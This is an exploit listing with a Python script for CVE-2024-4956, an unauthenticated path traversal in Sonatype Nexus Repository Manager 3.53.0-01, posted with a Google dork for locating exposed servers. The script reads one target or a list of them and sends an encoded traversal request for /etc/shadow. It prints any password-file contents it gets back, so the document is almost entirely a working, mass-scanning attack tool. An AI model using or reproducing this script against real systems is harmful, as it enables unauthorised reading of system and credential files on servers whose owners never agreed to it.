Sonatype Nexus Repository 3.53.0-01 - Path Traversal

HackApt-37 Team, verified member

# Exploit Title: CVE-2024-4956: Unauthenticated Path Traversal in Nexus Repository Manager 3
# Google Dork: Header='Server: Nexus/3.53.0-01(OSS)'
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/cve-2024-4956
# Vendor Homepage: https://www.sonatype.com/nexus-repository
# Software Link: https://www.sonatype.com/nexus-repository
# Version: 3.53.0-01
# Tested on: Ubuntu 20.04
# CVE: CVE-2024-4956
import requests
import random
import argparse
from colorama import Fore, Style

# Terminal colours used for the banner and the help text
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)


def banner():
    # Start-up banner, printed in a randomly chosen colour
    banner = f'''{bold}{random_color}
{bold}{white}@verylazytech - medium{reset}\n'''
    return banner


def read_ip_port_list(file_path):
    # One host:port entry per line
    with open(file_path, 'r') as file:
        lines = file.readlines()
    return [line.strip() for line in lines]


def make_request(ip_port, url_path):
    # Returns the response body, or None when the request fails
    url = f'http://{ip_port}/{url_path}'
    try:
        response = requests.get(url, timeout=5)
        return response.text
    except requests.RequestException:
        return None


def main(ip_port_list):
    for ip_port in ip_port_list:
        # Encoded traversal path(s) requested from each host
        for url_path in ['%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F。%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F ./etc/etc/shadow']:
            response_text = make_request(ip_port, url_path)
            # Report only responses that look like file contents rather than an error page
            if response_text and 'nexus:x:200:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false' not in response_text and 'Not Found' not in response_text and '400 Bad Request' not in response_text and 'root' in response_text:
                print(f'Address: {ip_port}')
                print(f'File Contents for passwd:\n{response_text}' if 'passwd' in url_path else f'File Contents for shadow:\n{response_text}')
                break


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=f'[{bold}{blue}Description{reset}]: {bold}{white}CVE-2024-4956')
    # Exactly one of -u / -l must be given
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', type=str, help=f'[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n')
    group.add_argument('-l', '--list', type=str, help=f'[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n')
    args = parser.parse_args()
    if args.list:
        ip_port_list = read_ip_port_list(args.list)
        print(banner())
        main(ip_port_list)
    elif args.url:
        ip_port_list = [args.url]
        print(banner())
        main(ip_port_list)
    else:
        print(banner())
        parser.print_help()
 